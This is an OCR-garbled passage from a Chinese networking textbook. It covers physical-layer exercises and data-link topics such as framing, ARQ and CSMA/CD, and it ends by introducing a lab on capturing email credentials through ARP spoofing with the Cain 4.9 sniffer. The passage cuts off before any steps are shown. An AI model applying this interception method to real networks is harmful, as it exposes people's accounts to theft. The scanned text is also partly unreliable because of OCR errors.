18. RS-232-C 串 行 总 线 接口 规定 ,使 用 9 针 或 25 针 插 口 ,这 是 由 物理 层 的 规 
定 的 。 
A. 机 械 特 性 B. 规程 特性 C. 电气 特性 D. 功能 特性 
19. 以 下 属于 数字 信号 传输 的 优点 是 
A. 传输 成 本 低 B. 传输 距离 远 
C. 传输 质量 好 D. 能 同时 传输 多 路 信号 
三 、 作 图 题 


有 一 比特 流 : 0 1 0 1 1 0 0 1 
1. 夯 出 单 极 性 不 归 零 码 。 

2. 夯 出 差分 编码 。 

3. 画 出 曼彻斯特 编码 。 

四 、 简 答题 

1. 简 述 中 继 器 工作 原理 。 

2. 简 述 数字 传输 和 模拟 传输 的 区 别 。 

3. 简 述 物理 层 功 能 和 作用 。 

4. 简 述 同步 传输 和 异步 传输 的 实现 方式 。 
5. 简 述 单 工 , 半 双 工 和 全 双 通 信 的 特点 。 
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第 4 章 数据 链 路 层 和 局 域 网 
介质 访问 方式 


线路 在 数据 链 路 层 协议 控制 下 被 称 为 链 路 。 数 据 链 路 层 处 于 OSI 参考 模型 的 第 二 层 ， 
介 于 物理 层 和 网 络 层 之 间 ,负责 连接 中 间 节 点 ,建立 维持 和 释放 连接 ,为 网 络 层 提供 透明 、 
正确 的 点 到 点 传输 链 路 。 

本 章 主要 介绍 数据 链 路 层 基本 概念 和 功能 ,讲述 数据 成 帧 的 方法 和 目的 ,着 重 分 析 流 量 
控制 和 差错 控制 实现 原理 和 方式 ,深入 讨论 不 同 局 域 网 介质 访问 控制 方式 ,最 后 引入 数据 链 
路 层 网 联 设备 ,并 指出 存在 的 安全 性 问题 。 


1. 知识 目标 

(1) 识 记 数据 链 路 层 四 大 功能 。 

(2) 理解 数据 成 帧 的 方法 和 目的 。 

(3) 理解 停 等 协议 和 滑动 窗口 协议 两 种 流量 控制 方法 。 
(4) 理解 局 域 网 基本 介质 访问 控制 方式 。 

(5) 识 记 交 换 机 3 种 交换 方式 。 

2. 能 力 目标 

(1) 掌握 ARP 命令 的 使 用 。 

(2) 掌握 Cain 4.9 局 域 网 嗅 探 工具 的 使 用 。 


4.1 数据 链 路 层 基本 功能 


数据 链 路 层 处 理 的 单位 被 称 为 数据 帧 。 发 送 方 在 每 个 数据 帧 帧 头 加 上 目的 Mac 地 址 
后 交 由 物理 层 。 物 理 层 将 数据 帧 拆 成 比特 流 ,转换 为 电信 号 或 光 信 号 通过 传输 介质 抵达 目 
的 主机 。 目 的 主机 再 把 接收 到 的 比特 流 拼 凑 成 数据 帧 交 由 网 络 层 , 并 依次 向 上 层 传达 。 因 
此 ,数据 链 路 层 基于 物理 层 服 务 ,为 网 络 层 提 供 点 到 点 服务 ,其 主要 功能 如 下 。 


4.1.1 成 帧 传输 


局 域 网 数据 帧 长 度 最 短 64B(512b) ,最 长 1518B, 不 同 网 络 中 数据 帧 长 度 可 以 不 同 , 但 
会 导致 计算 机 无 法 识别 从 其 他 网 络 发 送 过 来 的 数据 帧 ?-。 为 避免 这 个 问题 ,发 送 方 每 发 送 
一 帧 必须 在 帧 关 和 帧 尾 处 加 入 标识 ,根据 标识 类 型 可 以 分 为 带 填充 字符 的 首尾 界 符 法 和 带 


@@ ”假如 发 送 方 没有 在 每 个 数据 帧 中 加 入 起 始 和 结束 标志 ,接收 方 将 无 法 区 分 前 后 数据 帧 。 
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填充 位 的 首尾 标志 法 两 种 。 此 外 ,还 有 违法 编码 法 。 

(1) 带 填充 字符 的 首尾 界 符 法 。 带 填充 字符 的 首尾 界 符 法 采用 “DLE (Data Link 
Escape) "字符 序列 填充 帧 头 和 帧 尾 , 每 帧 以 DLE STX(Start of Text) 开 头 ,以 DLE ETX 
(End of Text) 结 尾 , 如 图 4-1 所 示 。 接 收 方 每 接收 一 组 标识 符 即 接收 到 完整 的 一 个 数据 帧 。 
带 填充 字符 的 首尾 界 符 法 依赖 于 字符 编码 ,兼容 性 差 , 如 果 帧 信息 字段 和 首尾 界 符 相 同 则 会 
造成 数据 帧 识别 错误 。 


© 


DLE ETX | 0 | 1 | 1 [pre stx|Dre ETX| 1 DLE st™x| 


帧 结束 帧 起 始 。 帧 结束 帧 起 始 


© 


图 4-1 带 填充 字符 的 首尾 界 符 法 


(2) 带 填 充 位 的 首尾 标志 法 。 带 填充 位 的 首尾 标志 法 使 用 *01111110” 作 为 帧 的 开始 和 
结束 标志 ,如 图 4-2 所 示 。 为 避免 数据 帧 信息 字段 出 现 *01111110? 被 误 判 为 帧 的 首尾 标志 ， 
发 送 方 在 比特 流 中 每 遇 到 5 个 连续 的 “1? 就 插 和 人 一 个 比特 “0”, 接 收 方 在 首尾 标志 之 间 每 收 
到 连续 的 5 个 “1” 则 自动 删除 后 面 的 比特 “0”。 


O1111110 |0|04:: | 1 1IOl1110| O11110 |1|0| :|1|1|01111110 


帧 结束 帧 起 始 。 帧 结束 帧 起 始 
图 4-2 带 填充 位 的 首尾 标志 法 


(3) 违法 编码 法 。 曼 彻 斯 特 编码 法 将 比特 1” 编码 成 “高 - 低 ”" 电 平 对 ,将 比特 0” 编码 成 
“ 低 -高 " 电 平 对 , 见 上 述 章 节 。 而 “高 高" 电 平 对 和 “ 低 - 低 " 电 平 对 在 数据 编码 中 属于 违法 。 
数据 帧 利用 * 低 - 低 ” 电 平 对 作为 帧 起 始 ,利用 “高 -高 ” 电 平 对 作为 帧 结束 。 违 法 编码 法 实现 
简单 ,高 效 便捷 ,不 需 任 何 填充 技术 ,广泛 应 用 于 IEEE 802 局 域 网 编码 中 。 


4.1.2 流量 控制 


数据 链 路 层 以 帧 为 单位 进行 处 理 , 把 数据 流 划 分 成 帧 的 目的 在 于 分 帧 传输 .应 答 和 重 
传 , 当 帧 丢失 或 出 错时 可 以 减少 重 传 数据 量 。 所 谓 流量 控制 ,是 为 保证 发 送 和 接收 速度 匹 
配 , 避 免 因 发 送 过 快 导致 接收 不 及 造成 接收 方 数据 丢失 。 常 用 流量 控制 方法 有 两 种 ,分 别 是 
停 等 协议 和 滑动 窗口 协议 。 

1. 停 等 协议 (Stop and Wait) 

停 等 协议 是 数据 链 路 层 基础 协议 。 发 送 方 每 发 一 帧 后 停 下 来 等 待 接收 方 的 应 答 信 息 ， 
这 里 存在 两 种 情况 。 

(1) 接收 方 返回 应 答 信号 ,表示 已 经 接收 到 本 帧 数据 ,准备 接收 下 一 帧 ; 发 送 方 接收 到 
应 答 信号 后 再 发 送 下 一 帧 。 

(2) 接收 方 没有 收 到 任何 数据 ,不 返回 应 答 信 号 ; 发 送 方 一 直 等 待 应 答 直 至 超时 ,认为 
数据 已 经 丢失 ,重新 发 送 本 帧 数据 。 
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停 等 协议 每 发 送 一 帧 后 必须 停 下 来 等 待 应 答 ,此 时 线路 上 仅 存 在 一 帧 ,造成 信道 浪费 ， 
并 且 线 路 越 长 浪费 越 严重 ,传输 速率 也 越 低 ,而 滑动 窗口 协议 能 很 好 解决 这 个 问题 。 

2. 滑动 窗口 协议 (Sliding Window) 

滑动 窗口 协议 可 以 连续 发 送 多 个 帧 而 无 须 每 发 一 帧 立即 停 下 来 等 待 应 答 信 息 。 如 
图 4-3 所 示 ,发 送 方 和 接收 方 以 类 似 窗口 形式 发 送 和 接收 数据 。 发 送 方 每 发 送 一 帧 着 时 针 
转 一 个 窗口 ,接收 方 每 接收 一 帧 顺 时 针 转 一 个 窗口 ,并 返回 应 答 信息 。 初 始 时 刻 , 发 送 方 处 
于 第 0 个 窗口 ,表示 准备 发 送 第 0 帧 ; 接收 方 也 处 于 第 0 个 窗口 ,表示 准备 接收 第 0 帧 ,如 
图 4-3(a) 所 示 ; 此 后 发 送 方 连续 发 送 数据 帧 ,目前 正 发 送 第 二 帧 ,而 第 0 帧 和 第 1 帧 还 未 抵 
达 接 收 方 , 此 时 线路 上 共存 在 3 帧 ,如 图 4-3(b) 所 示 ; 下 一 时 刻 ,发 送 方 第 0 帧 抵达 接收 方 ， 
接收 方 返回 应 答 信息 并 顺 时 针 转 一 个 窗口 ,准备 接收 第 1 帧 ,如 图 4-3(c) 所 示 ; 再 下 一 时 
刻 , 发 送 方 发 送 第 4 帧 ,同时 接收 到 第 0 帧 返回 的 应 答 ,发 送 方 将 本 周期 第 0 帧 替换 成 下 一 
周期 的 第 0 帧 ,如 图 4-3(d) 所 示 ,如 此 反复 。 


se 
A 一 一 一 一 A 二 7 全会 
名 一 一 
发 送 方 接收 方 发 送 方 接收 方 
pr 一 
ey _0 怖 已 收 到 38 A 0 已 收 到 _ 关 已 收 到 :RY 
发 送 方 接收 方 发 送 方 接收 方 


(0 (d) 
图 4-3 滑动 窗口 协议 
在 滑动 窗口 协议 中 ,线路 上 可 以 存在 nn 帧 ,n 值 越 大 发 送 速 率 越 快 ,线路 利用 率 越 高 , 当 
?一 1 时 则 相当 于 停 等 协议 。 


4.1.3 差错 控制 


若 发 送 数据 和 接收 数据 不 一 致 则 称 为 差错 。 差 错 不 可 避免 ,主要 由 两 方面 原因 造成 : 
随机 差错 ,由 介质 电子 热 运 动 造成 ,会 导致 传输 个 别 比 特 出 错 ; @ 突 发 差错 ,由 外 界 电磁 
干扰 造成 ,会 引发 连续 比特 出 错 。 数 据 通信 的 差错 程度 用 误 码 率 标识 ,是 指 二 进 制 比 特 在 传 
输 中 出 错 的 概率 ,用 以 衡量 数据 传输 的 可 靠 性 。 差 错 控制 是 检测 和 纠正 数据 传输 错误 的 机 
制 , 利 用 “差错 检测 技术 ”和 “差错 控制 机 制 " 对 丢失 或 出 错 数 据 请 求 重 发 。 

1. 差错 检测 技术 

差错 检测 技术 分 为 两 种 ,分 别 是 检 错 码 和 纠 错 码 。 

(1) 检 错 码 

检 错 码 是 在 每 帧 数据 中 附带 元 余 信 息 ,接收 方 通过 元 余 信 息 能 够 检测 传输 数据 是 否 出 
错 。 检 错 码 只 能 检测 错误 ,不 能 纠正 错误 ,数据 出 错 后 返回 错误 应 答 通知 发 送 方 重 传 。 基 本 
检 错 码 有 奇偶 校 验 码 .循环 元 余 检验 码 等 。 

奇偶 校 验 码 根据 二 进 制 比特 中 ”1 的 个 数 和 进行 校 验 , 有 奇 校 验 和 偶 校 验 两 种 。 奇 
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校 验 在 每 组 数据 中 增加 一 位 校 验 位 ,使 得 比特 *1? 的 个 数 恒 定 为 奇数 。 如 图 4-4 所 示 , 数 
据 中 *1” 的 个 数 为 4, 因 此 增加 的 奇 校 验 位 定义 为 *1” 以 满足 *1” 的 个 数 和 恒定 为 奇数 ; 接 
收 方 利 用 奇 校 验 进行 检 错 ,车 数 据 位 和 校 验 位 *1” 的 个 数 和 满足 为 奇数 则 认为 数据 没有 
出 错 。 偶 校 验 正 好 相反 ,在 每 组 数据 中 增加 的 偶 校 验 位 必须 满足 "1 的 个 数 和 恒定 为 偶 
数 。 如 图 4-5 所 示 ,数据 中 1” 的 个 数 为 4, 为 满足 *1” 的 个 数 恒定 为 偶数 , 偶 校 验 位 必须 
定义 为 “0”。 


lI 本 加 欧 本 本 0 o[ oololT | 
校 验 位 | 和 为 4 -| 校 验 位 = 和 为 4 -| 
图 4-4 奇 校 验 图 4-5 偶 校 验 


群 计数 把 每 组 数据 中 ”1 的 个 数 用 二 进 制 表示 ,并 随 数据 一 起 发 送 进行 检 错 。 如 图 4-6 
所 示 ,传输 数据 “01000111? 中 共有 4 个 “1” ,把 “4 转换 为 二 进 制 为 "100”, 填 人 计数 位 随 数据 
一 起 发 送 ; 接收 方 根据 计数 位 100”, 若 其 后 数据 含有 4 个 “1” 则 认为 没有 发 生 差错 。 


[ofrlolofofififij lilolol] 
- 1 的 个 数 为 4 - 计数 位 


图 4-6 群 计数 检 错 码 


循环 元 余 检 验 码 检 错 能 力 很 强 , 实 现 思想 是 收发 双方 事先 约定 G(x) ,发 送 方 根据 发 送 
的 数据 生成 校 验 和 多 项 式 f(x) 附加 在 帧 尾 一 起 发 送 ,使 f(x) 能 被 CCz) 除 尽 ; 接收 方 根据 
数据 生成 同样 的 校 验 和 f(z), 用 f(z)/G(z), 若 有 余数 则 表示 数据 传输 出 现 差错 。 校 验 和 
多 项 式 f(z) 生成 复杂 ,这 里 不 作 详细 说 明 。 

(2) 纠 错 码 

纠 错 码 是 在 每 个 数据 帧 中 附带 完 余 信息 ,接收 方 通过 元 余 信息 不 但 能 发 现 差错 ,还 
能 自动 对 传输 错误 进行 纠正 ,避免 数据 重 传 带 来 的 时 延 。 常 用 的 纠 错 码 有 海 明 码 、 正 反 

纠 错 码 虽然 能 及 时 发 现 和 纠正 错误 ,但 实现 复杂 ,并 且 数据 纠 错时 间 可 能 会 大 于 数据 重 
传 时 间 ,在 短 距 离 传输 中 一 般 不 宜 采 用 。 检 错 码 不 能 纠正 错误 ,但 可 以 通过 重 传 机 制 达 到 同 
样 效果 ,原理 简单 ,实现 容易 ,而 且 编 码 与 解码 速度 很 快 ,在 广域网 中 得 到 广泛 应 用 ?。 

2. 差错 控制 机 制 

差错 控制 的 主要 思想 是 利用 差错 检测 技术 和 自动 重 发 机 制 (Automatic Repeat Request， 
ARQ) 对 丢失 帧 和 错误 帧 纠 错 或 重 发 。 结 合流 量 控制 技术 ,差错 控制 方法 可 以 分 为 3 种 形 
式 , 分 别 为 停 等 ARQ 协议 .后退 N 帧 ARQ 协议 和 选择 性 ARQ 协议 。 

(1) 停 等 ARQ 协议 

停 等 ARQ 协议 基于 停 等 流量 控制 技术 。 发 送 方 每 发 送 一 帧 后 停 下 来 等 待 接收 方 应 答 
信息 ,和 流量 控制 不 同 的 是 停 等 ARQ 协议 存在 3 种 情况 。 

@ 肯定 应 答 : 发 送 方 返回 肯定 应 答 信息 ,表示 收 到 的 数据 帧 校 验 无 误 ,准备 接收 下 一 


@@ “局域网 因为 覆盖 范围 比较 小 ,数据 传输 距离 短 ,数据 发 生 差 错 的 概率 很 低 ,一 般 不 宜 对 数据 进行 检 错 。 
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帧 ; 发 送 方 接收 到 肯定 应 答 后 得 知 数据 帧 没有 发 生 差错 ,随即 发 送 下 一 帧 。 

@ 否定 应 答 : 发 送 方 返回 否定 答 认 信息 ,表示 收 到 的 帧 校 验 有 误 ,应 重新 发 送 该 帧 ; 发 
送 方 接收 到 和 否定 应 答 后 得 知 数据 帧 已 发 生 差 错 ,重新 发 送 本 帧 数据 。 

@ 超时 重 发 : 可 能 是 数据 帧 丢失 ,也 可 能 是 应 答 信息 丢失 ,发 送 方 没有 接收 到 返回 的 
任何 应 答 直 到 超时 ,重新 发 送 本 帧 数据 。 

由 于 停 等 ARQ 协议 基于 停 等 协议 ,因此 和 停 等 协议 一 样 线路 上 仅 能 存在 一 帧 ,线路 利 
用 率 低 ,浪费 严重 ,改进 方案 是 后 退 N 帧 ARQ 协议 和 选择 性 ARQ 协议 。 

(2) 后 退 N 帧 ARQ 协议 

后 退 N 帧 ARQ 协议 基于 滑动 窗口 流量 控制 技术 ,是 从 出 错 处 重新 发 送 已 经 发 出 的 N 个 
数据 帧 。 如 图 4-7(a) 所 示 , 目 前 发 送 方 处 于 第 5 个 发 送 窗口 ,已 经 连续 发 送 了 6 帧 ,并 接收 
到 返回 的 ”1 帧 正确 ”的 应 答 信 息 。 此 时 ,第 3 帧 刚好 抵达 接收 方 ,接收 方 通过 检 错 码 检测 到 
出 错 ,返回 “第 3 帧 错误 ”的 否定 应 答 , 并 一 直 处 于 第 三 个 接收 窗口 ?。 如 图 4-7(b) 所 示 ,下 
一 时 刻 发 送 方 收 到 *2 帧 正确 ”的 肯定 应 答 ,但 “第 3 帧 错误 ”的 否定 应 答 还 在 线路 中 传输 ,并 
且 第 4 帧 已 经 抵达 接收 方 , 由 于 接收 方 仍 处 于 第 三 个 接收 窗口 ,会 因 帧 序号 和 窗口 序号 不 一 
致 而 丢弃 。 如 图 4-7(c) 所 示 ,发 送 方 准备 发 送 第 7 帧 ,此 时 收 到 “第 3 帧 错误 ”的 否定 应 答 ， 
立刻 后 退 到 第 三 个 窗口 重新 发 送 第 3 帧 。 如 图 4-7(d) 所 示 , 同 时 第 5 帧 抵达 接收 方 后 被 丢 
弃 。 在 本 例 中 ,发 送 方 从 第 六 个 窗口 退 到 第 三 个 窗口 重新 发 送出 错 帧 , 共 后 退 了 3 帧 , 称 为 
后 退 3 帧 ARQ 协议 ,此 时 线路 上 共存 在 3 帧 。 在 后 退 N 帧 ARQ 协议 中 , 当 N 等 于 1 时 相 
当 于 停 等 A 协议 。 


Ce i Ua 
(a) (b) 


接收 方 发 送 方 、 接收 方 


SR 一 一 一 一 A£D KE 和 一 
CY i ay WY : a 
发 送 方 接收 方 发 送 方 本 


图 4-7 后 退 N 帧 ARQ 协议 
(3) 选择 性 ARQ 协议 
退 be 在 上 述 例子 中 第 3 帧 检验 出 错 ， En 

Poy 5.,6 这 3 帧 而 不 管 这 3 帧 是 否 正确 。 选 择 ”一 信 

性 ARQ Mt de 先 Ce 
择 性 重 发 出 错 帧 ,而 不 是 后 退 到 出 错 处 重新 发 送 其 后 7 ET 3 
所 有 帧 。 如 图 4-8 所 示 , 当 第 3 帧 检验 出 错 后 ,接收 方 。 发 送 方 接收 方 
仍 会 顺 时 针 转 一 个 窗口 ,表示 准备 接收 下 一 帧 第 4 帧 ， 图 4-8 选择 性 ARQ 协 议 


四 在 后 退 N 帧 ARQ 协议 中 ,接收 方 校 验 到 出 错 后 会 保持 当前 窗口 处 于 收 接 状 态 ,直到 接收 到 正确 数据 帧 为 止 。 
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而 不 是 一 直 处 于 出 错 窗 口 不 变 , 这 是 与 后 退 N 帧 ARQ 协议 的 本 质 区 别 。 
4.1.4 链 路 管理 


链 路 管理 包括 双 发 主机 链 路 建立 ` 维 持 和 释放 3 个 过 程 。 链 路 建立 是 协调 双方 主机 动 
作 , 使 目的 主机 做 好 同步 和 接收 准备 ; 链 路 维持 也 称 为 数据 传输 ,是 指 发 送 方 将 数据 包 加 上 
帧 头 和 帧 尾 形成 数据 帧 ,并 根据 返回 的 应 答 信息 决定 继续 发 送 下 一 帧 还 是 重 发 该 帧 ; 链 路 
释放 是 数据 帧 传输 完成 后 或 任何 一 方 希望 停止 对 话 ,拆除 传输 链 路 的 过 程 。 


4.2 局 域 网 介质 访问 控制 方式 


局 域 网 涉及 OSI 参考 模型 的 物理 层 和 数据 链 路 层 两 层 。 处 于 局 域 网 内 的 所 有 计算 机 
通过 查找 Mac 地 址 通信 ,不 涉及 网 络 层 的 IP 计算 和 路 由 选择 范畴 ,因此 局 域 网 主机 即使 
没有 配置 IP 地 址 也 能 相互 通信 。 局 域 网 类 型 繁多 ,介质 接 入 和 访问 控制 方法 也 各 不 相 
同 。 为 简化 局 域 网 逻辑 结构 ,将 数据 链 路 层 再 划分 为 两 个 子 层 次 ,分 别 是 逻辑 链 路 控 
制 子 层 (LLC) 和 介质 访问 控制 子 层 (Mac) 。 局 域 网 在 OSI 参考 模型 中 的 位 置 如 图 4-9 
所 示 。 

局 域 网 模型 各 层 功 能 如 下 。 

@ 物理 层 : 为 主机 通信 提供 必要 的 物理 线路 连接 以 传输 比特 流 , 同 时 统一 发 送 设备 和 
接收 设备 之 间 的 机 械 、 电 气 、 功 能 和 规程 4 个 特性 。 

@ 介质 访问 控制 子 层 : 由 于 局 域 网 主机 共享 单一 信道 ,因此 与 外 网 通信 时 存在 介质 争 
用 问题 。 介 质 访问 控制 子 层 就 是 控制 局 域 网 主机 对 传输 介质 的 争 用 ,并 且 实 现 数据 帧 的 封 
装 和 Mac 地 址 寻 址 。 

@ 逻辑 链 路 控制 子 层 : 介质 访问 控制 子 层 通 过 查询 Mac 地 址 找到 目的 主机 ,并 交 由 逻 
辑 链 路 控制 子 层 。 逻 辑 链 路 控制 子 层 的 任务 是 为 通信 双方 主机 建立 .维持 和 释放 逻辑 连接 。 

局 域 网 可 以 分 为 共享 式 局 域 网 和 交换 式 局 域 网 两 种 。 共 享 式 局 域 网 中 的 所 有 主机 共享 
单一 数据 总 线 , 有 总 线 型 .环形 、 星 形 和 树 型 4 种 拓扑 结构 ,每 种 结构 都 有 其 独特 的 介质 访问 
控制 方式 。 所 谓 介质 访问 控制 方式 ,是 让 所 有 主机 平等 .高效 地 共享 单一 传输 介质 ,因此 介 
质 访问 控制 方式 决定 着 局 域 网 整体 性 能 。 

(1) 总 线 型 网 络 介质 访问 控制 方式 

总 线 型 局 域 网 采用 带 冲 突 检 测 的 载波 监听 多 路 访问 (CSMA/CD9) 控 制 方法 。 总 线 型 
局 域 网 采用 同 轴 电缆 作为 传输 介质 ,局 域 网 内 的 所 有 计算 机 通过 本 型 转 接头 接 人 数据 总 
线 , 共 享 单一 信道 。 由 于 总 线 只 能 传输 一 路 数字 信号 ,并 且 任 意 一 节点 通过 总 线 发 出 的 数据 
都 会 广播 至 网 络 中 所 有 节点 ,因此 若 多 个 节点 同时 占用 总 线 发 送 数 据 则 会 产生 冲突 ,如 
图 4-10 所 示 。 


@@ ”英文 全 称 : Carrier Sense Multiple Access/Confict Dectet。 
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| 网络 疙 天 基 动 与 雪 们 

OSI 参考 模型 
应 用 层 
表示 层 [| 已 
会 话 层 时 杠 有 司 ] 
传输 层 IEEE802 参 考 模型 3 4|- 一 “15 
网 络 层 _ 一 -| 迎 辑 链 路 控制 层 总 线 

数据 甸 路 层 ”| 介质 访问 控制 导 [1] LJ 
物理 层 | 物理 层 i 

图 4-9 局 域 网 在 OSI 参考 模型 中 的 位 置 图 4-10 总 线 型 局 域 网 的 数据 冲突 


为 解决 节点 之 间 争 用 信道 的 问题 ,CSMAVCD 协议 规定 各 节点 在 发 送 数据 之 前 必须 先 
监听 总 线 信道 是 否 空闲 。 若 总 线 已 有 数据 发 送 则 继续 监听 ,直到 线路 空闲 时 再 发 送 数据 , 具 
体 过 程 如 下 。 

QO 某 节点 A 在 发 送 数 据 之 前 , 先 处 于 监听 状态 。 

@ 若 总 线 忙 , 则 继续 监听 ,并 等 待 一 段 随机 时 间 继 续 监听 ; 若 总 线 信 道 空闲 , 则 立刻 发 
送 数据 。 

@ 在 发 送 数据 过 程 中 如 果 节 点 A 检测 到 冲突 了, 则 默认 为 已 发 送 的 数据 受到 冲撞 , 立 
即 停止 发 送 ,并 发 出 阻塞 信号 通知 总 线 各 节点 已 发 生 冲 突 。 

@ 网 络 中 所 有 节点 立刻 停止 发 送 数据 ,并 等 待 一 段 随机 时 间 再 尝试 重新 发 送 。 

CSMA/CD 协议 虽然 能 解决 总 线形 局 域 网 数据 冲突 问题 ,但 执行 效率 不 高 ,并 且 随 着 网 
络 规模 的 扩大 ,节点 间 用 于 解决 冲突 的 时 间 可 能 大 于 实际 数据 传输 的 时 间 ,网 络 运行 效率 低 
下 ,因此 总 线 型 拓扑 适用 于 组 建 通信 量 不 大 的 小 规模 局 域 网 。 

(2) 环形 网 络 介质 访问 控制 方式 

环形 局 域 网 采用 令 牌 环 (Token Ring) 介 质 访问 控制 方法 。 在 环形 网 络 中 , 相 邻 节 点 通 
过 同 轴 电 缆 相互 连接 ,组 成 闭合 数据 总 线 , 只 能 传输 一 路 数字 信号 。 在 环形 网 络 中 , 若 节 点 
同时 占用 总 线 传 输 数 据 则 会 造成 冲突 ,为 解决 节点 之 间 信 道 争 用 问题 , 令 牌 环 访问 控制 方法 
通过 传递 令 牌 的 方式 实现 介质 访问 权限 , 即 哪个 节点 拥 
有 令 牌 ,哪个 节点 占用 环 路 总 线 发 送 数据 ,如 图 4-11 所 今 牌 
示 。 具 体 实现 过 程 如 下 。 

@ 当 环 行 网 络 中 没有 数据 要 发 送 时 , 令 牌 标记 为 空 
标记 *01111111”, 并 以 逆 时 针 方 向 在 环形 网 络 中 循环 。 

@ 若 节点 A 发 数据 至 节点 C, 首 先 必须 等 待 令 牌 
的 到 来 ,并 将 空 标记 置换 为 忙 标 记 *01111110”。 

@ 节点 A 将 数据 附 随 令 牌 传递 至 下 一 节点 B。 由 
于 令 牌 是 忙 标记 , 故 节点 也 不 能 向 总 线 发 送 数据 ,只 能 一 
被 动 接收 ,但 会 因 地 址 不 吻合 而 丢弃 。 图 4-11 令 牌 环 访问 控制 方法 

@ 令 牌 传递 至 下 一 节点 C, 节 点 C 在 接收 到 忙 标 


| 节点 ^ 


@@ 《冲突 是 由 节点 发 送 的 数据 与 其 他 节点 的 数据 或 监听 信号 产生 碰撞 造成 的 。 
62 


第 4 章 数据 链 路 层 和 局 域 网 介质 访问 方式 


记 令 牌 后 ,检验 地 址 和 令 牌 数据 是 否 正 确 , 待 检验 无 误 后 在 令 牌 上 替换 为 肯定 应 答 信息 。 

@ 令 牌 循环 一 周 后 由 节点 A 自身 收回 。 节 点 A 检查 令 牌 附带 的 应 答 信息 , 若 为 否定 
应 答 则 重 发 该 数据 帧 , 若 为 肯定 应 答 则 将 忙 标 记 置换 为 空 标记 ,并 传递 给 下 一 节点 B, 释 放 
信道 ,完成 发 送 任务 。 

在 环形 网 络 中 ,数据 帧 随 令 牌 发 送 一 周 后 由 发 送 节点 本 身 回收 。 由 于 节点 需要 等 待 令 
牌 到 来 才能 发 送 数据 ,并 且 节 点 数量 越 多 令 牌 循环 一 周 时间 越 长 ,因此 整个 环形 网 络 运行 效 
率 不 高 ,并 且 任 意 一 节点 故障 会 导致 整个 网 络 不 可 用 ,适用 于 组 建 小 规模 局 域 网 。 

(3) 星 形 网 络 介质 访问 控制 方式 

共享 式 星 形 局 域 网 采用 同步 时 分 复 用 介质 访问 控制 方法 。 在 星 形 网 络 中 ,所 有 节点 共 
享 中 心 节点 (集线器 ) 带 宽 , 处 于 同一 冲突 中 。 一 节点 发 送 的 数据 会 广播 至 网 络 中 的 所 有 节 
点 , 若 多 个 节点 同时 发 送 则 会 产生 冲突 。 为 合理 分 配 中 心 节点 资源 ,集线器 采取 同步 时 分 复 
用 方法 共享 中 心 节点 带宽 。 同 步 时 分 复 用 技术 可 参阅 前 面 有 关 章 节 。 

共享 式 星 形 局 域 网 所 有 节点 处 于 同一 冲突 域 中 ,网 段 节点 越 多 ,规模 越 大 ,发 生 冲突 的 
几率 就 越 大 ,不 能 用 于 组 建 大 型 复杂 网 络 。 为 扩大 网 络 规模 ,减少 冲突 ,可 在 增加 网 段 基础 
上 减少 单个 网 段 节点 数量 ,由 此 提出 了 交换 式 局 域 网 。 在 交换 式 局 域 网 中 ,每 个 网 段 都 是 一 
个 独立 的 冲突 域 , 一 个 网 段 发 生 冲突 不 会 影响 到 其 他 网 段 。 

交换 式 局 域 网 同样 采取 星 形 拓扑 结构 ,交换 机 是 整个 网 络 的 核心 ,每 个 端口 属于 不 同 网 
段 ,之 间 通 过 逻辑 通道 连接 ,不 同 网 段 节点 选择 不 同 逻 辑 通道 发 送 和 接收 数据 ,不 存在 信道 争 
用 问题 。 在 与 外 网 连接 中 ,不管 是 共享 式 局 域 还 是 交换 式 局 域 网 都 仅 存在 单一 数据 总 线 , 然 而 
不 同 的 是 交换 式 局 域 网 采用 异步 时 分 复 用 技术 争 用 信道 ,减少 信道 浪费 ,最 大 可 达 总 线 带 宽 。 


4.3 数据 链 路 层 网 联 设 备 和 安全 


工作 任务 五 ”截获 邮箱 账号 


本 节 主 要 讲述 利用 Cain 4. 9 监听 工具 结合 ARP 欺骗 捕捉 邮件 用 户 名 和 密码 ,要 求 读 
者 理解 交换 式 局 域 网 监听 原理 ,学 会 Cain 4. 9 监听 工具 的 使 用 技巧 ,最 后 掌握 应 对 ARP 欺 
骗 的 防范 方法 和 措施 。 

工作 目的 

利用 ARP 欺骗 捕获 邮箱 用 户 名 和 密码 。 

工作 任务 

小 张 是 公安 机 关 科技 部 工作 人 员 , 需 对 疑犯 王 某 进 行 24h 监控 。 王 某 走 进 网 吧 通 过 邮 
件 通知 与 之 接头 的 许 某 ,包括 时 间 、 地 点 和 交接 方式 。 上 级 要 求 小 张 在 网 吧 进 行 蹲点 ,并 学 
试 捕获 王 某 发 送 邮件 的 内 容 和 收 件 人 账号 。 

任务 分 析 

小 张 发 现 网 吧 接 入 层 采用 二 层 交换 机 组 成 交换 式 局 域 网 。 由 于 交换 式 局 域 网 基于 Mac 


@ ”共享 式 星 形 局 域 网 的 主机 不 管 是 内 网 传输 还 是 接 人 外 网 ,都 通过 同步 时 分 复 用 技术 分 配 信道 。 
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地 址 通信 ,交换 机 收 到 数据 帧 后 通过 查找 “Mac- 端 口 ” 映 射 表 转 发 ,不 像 共 享 式 局 域 网 存在 
广播 现象 。 要 截获 局 域 网 数据 包 必 须 先 对 目的 主机 进行 ARP 欺骗 。 经 分 析 , 小 张 通过 座 
位 表 查 阅 到 王 某 IP, 利 用 Cain 4. 9 监听 工具 结合 ARP 欺骗 尝试 捕获 邮件 账号 名 和 密码 。 


工作 环境 和 工具 
工作 任务 五 的 工作 环境 拓扑 图 如 图 4-12 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/ 


jpkc/lf 中 下 载 。 
CE 


交换 机 。 路由器, 网 关 
IP : 192.168.1.1 
Mask : 255.255.255.0 


主机 1 小 张 主机 2 疑犯 王 某 
IP: 192.168.1.10 JP : 192.168.1.20 
Mask : 255.255.255.0 Mask : 255.255.255.0 
Gateway : 192.168.1.1 Gateway : 192.168.1.1 


本 实验 Mac 地 址 | 操作 系统 软件 
Windows XP | Cain 4.9 
Windows XP 


| 主机 名 称 | 担任 角色 | IP 地 址 
192.168.1.10 | 009027FC4A07 


192.168.1.30 | 000C29040D4A 
000FE24EC878 


疑犯 王 某 
| 路 由 器 | 网 关 | 192.168.1.1 


图 4-12 工作 任务 五 的 工作 环境 拓扑 图 


Cain 4. 9 是 一 款 局 域 网 嗅 听 和 密码 分 析 破 解 工 具 , 自 带 ARP 欺骗 功能 ,可 以 根据 指定 
的 协议 发 送 和 过 滤 数 据 包 ,并 自动 捕获 账号 名 和 口令 ,包括 FTP、.HTTP、POP3、TELNET 
等 密码 。 

工作 过 程 

